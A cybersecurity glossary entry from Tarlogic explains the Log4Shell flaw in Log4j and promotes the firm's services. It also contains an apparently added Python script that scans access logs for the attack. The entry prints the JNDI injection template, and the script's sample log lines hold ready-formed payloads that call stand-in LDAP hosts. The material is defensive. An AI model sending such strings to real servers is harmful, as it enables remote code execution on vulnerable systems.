Cybersecurity Glossary

What is Log4Shell?

Log4Shell is a remotely exploitable vulnerability in Log4j, a Java logging component that thousands of applications use to keep logs of application activity.

Log4Shell is the name given to the vulnerability that MITRE identifies as CVE-2021-44228. It stems from a flaw in how data reaching this component is filtered, which allows a JNDI injection: specially crafted strings could be injected that led to arbitrary code execution.

In most cases, it was enough to add the following content to any HTTP request to force the Log4j component to establish a connection to the attacker’s LDAP server and execute arbitrary code:

${jndi:ldap://[server]/[payload]}
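For triage, the string above can be searched for in web server access logs. The following is an added example, not code from Tarlogic: it assumes Combined Log Format, and the log lines, addresses and hostnames are constructed samples. It percent-decodes each field before matching and reports which client sent the string and which LDAP server it pointed to.

```python
import re
from urllib.parse import unquote

# The lookup form shown above: ${jndi:ldap://[server]/[payload]}
JNDI_RE = re.compile(r"\$\{jndi:ldap://([^/\s}]+)[^}\s]*\}", re.IGNORECASE)
# Combined Log Format: ip - user [time] "request" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded strings are also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi(line):
    """Return one finding per JNDI LDAP lookup string in a log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    findings = []
    for field in ("request", "referer", "agent"):
        for hit in JNDI_RE.finditer(decode(m.group(field))):
            findings.append({"ip": m.group("ip"), "time": m.group("time"),
                             "field": field, "server": hit.group(1).lower()})
    return findings

def scan(lines):
    return [f for line in lines for f in find_jndi(line)]

# Constructed sample lines (documentation addresses, example hostnames).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://ldap.example.net/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fldap.example.net%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.44 - - [10/Dec/2021:10:02:00 +0000] "GET /search HTTP/1.1" 200 90 "${JNDI:LDAP://Other.Example.org/x}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'{f["time"]} {f["ip"]} {f["field"]} -> {f["server"]}')
```

The pattern covers only the literal form shown on this page, so an empty result does not rule out exploitation attempts; the extracted server names are the ones to look for in outbound connection and DNS logs.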

Various technical articles concerning Log4Shell and cybersecurity have been released on Tarlogic’s web page.

Vulnerability management: This continuous vulnerability assessment service allows for managing the vulnerability life cycle and minimizing the exposure surface.

Emerging vulnerabilities: This service is triggered when a critical vulnerability, like Log4Shell, that could impact your organization’s perimeter is published, enabling early reaction. We examine the impact of zero-day vulnerabilities on the perimeter 24 hours a day, 7 days a week, and pinpoint affected assets.

Threat Hunting: A managed service focused on the proactive detection of suspicious behavior and threat containment in endpoints, utilizing telemetry produced by EDR and XDR technologies, and adhering to the methodology outlined in the MITRE ATT&CK framework.